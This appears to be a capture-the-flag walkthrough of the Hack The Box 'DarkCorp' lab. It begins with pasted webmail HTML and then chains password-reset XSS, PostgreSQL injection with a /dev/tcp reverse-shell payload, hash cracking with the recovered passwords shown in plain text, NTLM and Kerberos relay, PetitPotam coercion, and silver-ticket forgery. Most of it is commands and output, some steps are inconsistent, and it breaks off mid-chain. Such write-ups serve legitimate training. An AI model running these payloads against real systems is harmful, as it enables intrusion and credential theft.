<div id="markmessage-menu" class="popupmenu">
	<h3 id="aria-label-markmessage-menu" class="voice">Mark selected messages as...</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-markmessage-menu">
		<li role="menuitem"><a class="read disabled" id="rcmbtn120" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','read',this,event)">As read</a></li>
		<li role="menuitem"><a class="unread disabled" id="rcmbtn121" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unread',this,event)">As unread</a></li>
		<li role="menuitem"><a class="flag disabled" id="rcmbtn122" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','flagged',this,event)">As flagged</a></li>
		<li role="menuitem"><a class="unflag disabled" id="rcmbtn123" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unflagged',this,event)">As unflagged</a></li>
		
		
	</ul>
</div>



		</div>
	
	<div class="content frame-content" role="main">
		<div id="message-header">
			<h2 class="subject">
				<span class="voice">Subject: </span>
				Analytics Dashboard
				
			</h2>
			<div class="header">
				<img src="/?_task=addressbook&amp;_action=photo&amp;_email=ebelford%40drip.htb&amp;_error=1&amp;_bgcolor=transparent" alt="Contact photo" class="contactphoto" onerror="this.onerror = null; this.src = 'skins/elastic/images/contactpic.svg';">
				<div class="header-content">
					<div class="header-summary"><span>From <span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','ebelford &lt;[email protected]&gt;',this)" title="[email protected]">ebelford</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','ebelford &lt;[email protected]&gt;',this)"></a></span> on <span class="text-nowrap">2024-12-24 13:38</span></span></div>
					<table class="header-headers"><tbody><tr><td class="header-title">From</td><td class="header from"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','ebelford &lt;[email protected]&gt;',this)" title="[email protected]">ebelford</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','ebelford &lt;[email protected]&gt;',this)"></a></span></td></tr><tr><td class="header-title">To</td><td class="header to"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Date</td><td class="header date">2024-12-24 13:38</td></tr></tbody></table>
					<div class="header-links">
						
						
						<a href="#headers" class="headers-summary" onclick="return UI.headers_show(true)"></a>
						<a href="#all-headers" class="headers-all" onclick="return UI.headers_dialog()">Headers</a>
						
						
						
					</div>
				</div>
			</div>
		</div>
		<div id="message-content">
			<div class="leftcol" role="region" aria-labelledby="aria-label-messageattachments">
				<h2 id="aria-label-messageattachments" class="voice">Attachments</h2>
				
			</div>
			<div class="rightcol" role="region" aria-labelledby="aria-label-messagebody">
				<h2 id="aria-label-messagebody" class="voice">Message Body</h2>
				<div id="message-objects">
<div id="remote-objects-message" class="notice" style="display: none"><span>To protect your privacy remote resources have been blocked.</span>&nbsp;<span class="boxbuttons"><a href="#loadremote" onclick="rcmail.command('load-remote')">Allow</a></span></div>
</div>
				<div id="messagebody"><div class="message-part" id="message-part1"><div class="pre">Hey Bryce,<br>
<br>
The Analytics dashboard is now live. While it&#039;s still in development and limited in functionality, it should provide a good starting point for gathering metadata on the users currently using our service.<br>
<br>
You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you&#039;ll need to reset your password before logging in.<br>
<br>
If you encounter any issues or have feedback, let me know so I can address them promptly.<br>
<br>
Thanks<br>
</div></div></div>
			</div>
		</div>
	</div>
</div>

<!-- popup menus -->
<div id="attachmentmenu" class="popupmenu">
	<h3 id="aria-label-attachmentmenu" class="voice">Attachment options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-attachmentmenu">
		<li role="menuitem"><a id="attachmenuopen" class="extwin disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open-attachment','',this,event)">Open</a></li>
		<li role="menuitem"><a id="attachmenudownload" class="download disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download-attachment','',this,event)">Download</a></li>
		
	</ul>
</div>

<div id="mailto-menu" class="popupmenu">
	<h3 id="aria-label-mailtomenu" class="voice">Email address options</h3>
	<ul class="menu listing" role="menu" aria-labelledby="aria-label-mailtomenu">
		<li role="menuitem"><a class="addressbook" id="rcmbtn124" role="button" tabindex="-1" aria-disabled="true" href="#">Add to address book</a></li>
		<li role="menuitem"><a class="compose" id="rcmbtn125" role="button" tabindex="-1" aria-disabled="true" href="#">Compose mail to</a></li>
		
	</ul>
</div>


</div>



<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="skins/elastic/deps/bootstrap.bundle.min.js?s=1716107245"></script>
<script src="skins/elastic/ui.min.js?s=1716107237"></script>

</body>
</html>

And we can see this message in it:

You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you'll need to reset your password before logging in.

We’ve got a new endpoint to access http://dev-a3f1-01.drip.htb
As per the message, we can reset the password. The steps are as follows:

• go to http://dev-a3f1-01.drip.htb/forgot
• enter bcase@drip.htb email and spam it
• spam the xss attack for different uids (from 2 to 6 for example) (uid is the id of the email) (I find it on uid 5)

username: bcase
password: new_password

SIDE NOTE:
noticed the first link: http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67uyw.qKq2xqbpySG1wnw6mq0EMnMA1qI
and second link: http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67yeQ.JowFY4TQdpIcKVu12DqU7lScefI
They have this in common:http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.Z67

Web App

We can discover an SQL injection with some testing:

''; SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 1000000);

We get this data back:

|ID|Username|E-Mail|Host Header|IP Address|
|---|---|---|---|---|
|5001|support|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5002|bcase|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5003|ebelford|[email protected]|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0|10.0.50.10|
|5004|kujen|[email protected]|Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0|172.16.20.1|

I can also get a reverse shell:

'';DO $$ DECLARE c text; BEGIN c:=CHR(67)||CHR(79)||CHR(80)||CHR(89)||' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.16.20/9001 0>&1"''';EXECUTE c; END $$;

And we get it on our listener:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.20] from (UNKNOWN) [10.129.161.63] 49960
bash: cannot set terminal process group (156517): Inappropriate ioctl for device
bash: no job control in this shell
postgres@drip:/var/lib/postgresql/15/main$

Checking the /etc/hosts file, we get the DC access:

postgres@drip:/var/lib/postgresql/15/main$ cat /etc/hosts
cat /etc/hosts
127.0.0.1       localhost drip.htb mail.drip.htb dev-a3f1-01.drip.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb
172.16.20.3 drip.darkcorp.htb
postgres@drip:/var/lib/postgresql/15/main$

We can use the postgres data we got earlier to decode the postgres DB:

postgres@drip:/var/lib/postgresql/15/main$ gpg --homedir /var/lib/postgresql/.gnupg --pinentry-mode=loopback  --passphrase 2Qa2SsBkQvsc --use-agent --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > dev-dripmail.old.sql
<res/dev-dripmail.old.sql.gpg > dev-dripmail.old.sql
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
      "postgres <[email protected]>"

In it we find some user hashes:

postgres@drip:/var/lib/postgresql/15/main$ cat dev-dripmail.old.sql
cat dev-dripmail.old.sql
--                                                                                                                                                                                                                                          
-- PostgreSQL database dump                                                                                                                                                                                                                 
--

-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)

SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;

SET default_tablespace = '';

SET default_table_access_method = heap;

--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public."Admins" (
    id integer NOT NULL,
    username character varying(80),
    password character varying(80),
    email character varying(80)
);


ALTER TABLE public."Admins" OWNER TO postgres;

--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public."Admins_id_seq"
    AS integer
    START WITH 1
    INCREMENT BY 1
    NO MINVALUE
    NO MAXVALUE
    CACHE 1;


ALTER TABLE public."Admins_id_seq" OWNER TO postgres;

--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;


--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--

CREATE TABLE public."Users" (
    id integer NOT NULL,
    username character varying(80),
    password character varying(80),
    email character varying(80),
    host_header character varying(255),
    ip_address character varying(80)
);


ALTER TABLE public."Users" OWNER TO postgres;

--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--

CREATE SEQUENCE public."Users_id_seq"
    AS integer
    START WITH 1
    INCREMENT BY 1
    NO MINVALUE
    NO MAXVALUE
    CACHE 1;


ALTER TABLE public."Users_id_seq" OWNER TO postgres;

--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--

ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;


--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);


--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);


--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Admins" (id, username, password, email) FROM stdin;
1       bcase   dc5484871bc95c4eab58032884be7225        [email protected]
2   victor.r    cac1c7b0e7008d67b6db40c03e76b9c0    [email protected]
3   ebelford    8bbd7f88841b4223ae63c8848969be86    [email protected]
\.


--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001    support d9b9ecbf29db8054b21f303072b37c4e        [email protected]        Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0   10.0.50.10
5002    bcase   1eace53df87b9a15a37fdc11da2d298d        [email protected]  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0   10.0.50.10
5003    ebelford        0cebd84e066fd988e89083879e88c5f9        [email protected]       Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0   10.0.50.10
\.


--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);


--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--

SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);


--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Admins"
    ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);


--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--

ALTER TABLE ONLY public."Users"
    ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);


--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--

GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;


--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--

GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;


--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--

GRANT SELECT ON TABLE public."Users" TO dripmail_dba;


--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--

GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;


--
-- PostgreSQL database dump complete

Crack 8bbd7f88841b4223ae63c8848969be86 with hashcat mode 0:

ebelford:8bbd7f88841b4223ae63c8848969be86:ThePlague61780
victor.r:cac1c7b0e7008d67b6db40c03e76b9c0:victor1gustavo@#

We connect to the web server is 172.16.20.2:

ssh [email protected] -L 5000:172.16.20.2:5000

Now access it with victor creds.
Requests are using NTLM auth: Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAgAAAAAAAAACAAAAA=

NTLM Relay Attack

https://www.horizon3.ai/attack-research/n0-attack-paths/the-elephant-in-the-room-ntlm-coercion-and-understanding-its-impact/

https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx

first sshuttle to forward everything:

sshuttle -r ebelford:'ThePlague61780'@drip.htb 172.16.20.0/24 -vv

Then take ligolo and forward 172.16.20.3:8080 => 10.10.16.20:80:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ ./proxy -selfcert -laddr 0.0.0.0:11601
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: D871C6F4F0C13D0CDD8E7A4AB12780DB6BE86D61718A9DFF51F70E1786E57860 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » INFO[0007] Agent joined.                                 id=da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca name=ebelford@drip remote="10.129.190.115:49954"
ligolo-ng » 
ligolo-ng » session
? Specify a session : 1 - ebelford@drip - 10.129.190.115:49954 - da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca
[Agent : ebelford@drip] » start
[Agent : ebelford@drip] » INFO[0017] Starting tunnel to ebelford@drip (da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca) 
[Agent : ebelford@drip] » 
[Agent : ebelford@drip] » listener_add --addr 172.16.20.3:8080 --to 127.0.0.1:80 --tcp
INFO[0035] Listener 0 created on remote agent!          
[Agent : ebelford@drip] » ERRO[0110] read tcp 127.0.0.1:50878->127.0.0.1:80: use of closed network connection 



ebelford@drip:~$ ./agent -connect 10.10.16.20:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established     

Then: First:

                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$ sudo impacket-ntlmrelayx -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.16.20     
[sudo] password for kali: 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.16.20` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)





┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ curl 'http://172.16.20.2:5000/status' --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8080"}' -u 'victor.r:victor1gustavo@#' --ntlm
{"message":"http://drip.darkcorp.htb:8080 is down (HTTP 401)","status":"Error!"}

THEN kill ntlmrelay and:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/krbrelayx]
└─$ python3 krbrelayx.py  -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.190.115
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.190.115
[*] GOT CERTIFICATE! ID 5
[*] Writing PKCS#12 certificate to ./WEB-01$.pfx
[*] Certificate successfully written to file
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user WEB-01$ since attack was already performed




┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$ python3 PetitPotam.py -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01
/home/kali/Hackthebox/DarkCorp/PetitPotam/PetitPotam.py:20: SyntaxWarning: invalid escape sequence '\ '
  show_banner = '''

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:web-01[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$ 

now get a TGT and eventually the nthash for the machine

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ sudo ntpdate 172.16.20.1   
2025-02-14 14:55:32.678602 (+0100) +477.887870 +/- 0.253771 172.16.20.1 s1 no-leap
CLOCK: time stepped by 477.887870
                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 ../../PKINITtools/gettgtpkinit.py -cert-pfx 'WEB-01$.pfx' 'DARKCORP.HTB/WEB-01$' WEB-01.ccache
2025-02-14 14:55:37,338 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-14 14:55:37,719 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-14 14:55:45,238 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-14 14:55:45,238 minikerberos INFO     71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6
INFO:minikerberos:71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6
2025-02-14 14:55:45,241 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]

Next we recover the hash:

                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=WEB-01.ccache python3 ../../PKINITtools/getnthash.py -key 71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6 'darkcorp.htb/WEB-01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
8f33c7fc7ff515c1f358e488fbb8b675
                                                                                                                    
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ 

Now forge a silver ticket using the WEB01$ hash and the domain sid:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP        172.16.20.1     389    DC-01            [+] darkcorp.htb\victor.r:victor1gustavo@# 
LDAP        172.16.20.1     389    DC-01            Domain SID S-1-5-21-3432610366-2163336488-3604236847

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ impacket-ticketer -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-2988385993-1727309239-2541228647 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for darkcorp.htb/Administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We can check our ticket:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ klist                                                            
Ticket cache: FILE:Administrator.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
02/14/2025 14:59:52  02/12/2035 14:59:52  cifs/[email protected]
        renew until 02/12/2035 14:59:52

And now authenticate with the cert:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ sudo ntpdate -t 20 172.16.20.1
2025-02-14 20:21:45.390010 (+0100) +479.045611 +/- 0.941473 172.16.20.1 s1 no-leap
CLOCK: time stepped by 479.045611
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ certipy-ad auth -pfx 'WEB-01$.pfx' -u 'WEB-01$' -domain darkcorp.htb -dc-ip 172.16.20.1 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: web-01$@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675
                      

[Agent : ebelford@drip] » interface_create --name darkcorp
INFO[0275] Creating a new "darkcorp" interface...       
error: Tuntap IOCTL TUNSETIFF failed [0], errno device or resource busy
[Agent : ebelford@drip] » tunnel_start --tun darkcorp
[Agent : ebelford@drip] » INFO[0287] Starting tunnel to ebelford@drip (0a31c47b-6351-4691-ae64-0e78a22ac6ed) 
[Agent : ebelford@drip] » 
[Agent : ebelford@drip] » autoroute
? Select routes to add: 172.16.20.3/24
? Create a new interface or use an existing one? Use an existing one
? Select the interface to use darkcorp
INFO[0296] Using interface darkcorp, creating routes... 
ERRO[0296] Could not add route 172.16.20.3/24: file exists 
? Start the tunnel? Yes
[Agent : ebelford@drip] » INFO[0298] Starting tunnel to ebelford@drip (0a31c47b-6351-4691-ae64-0e78a22ac6ed) 
ERRO[0298] Unable to create tunnel, err:unable to open tun interface 'darkcorp' (tun.New device or resource busy), make sure you've created the tun interface and that it's not in use 
[Agent : ebelford@drip] » 
[Agent : ebelford@drip] »  

Finally we can get the administrator hash by dumping secrets:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP        172.16.20.1     389    DC-01            [+] darkcorp.htb\victor.r:victor1gustavo@# 
LDAP        172.16.20.1     389    DC-01            Domain SID S-1-5-21-3432610366-2163336488-3604236847                                                                                          
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ ticketer.py -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
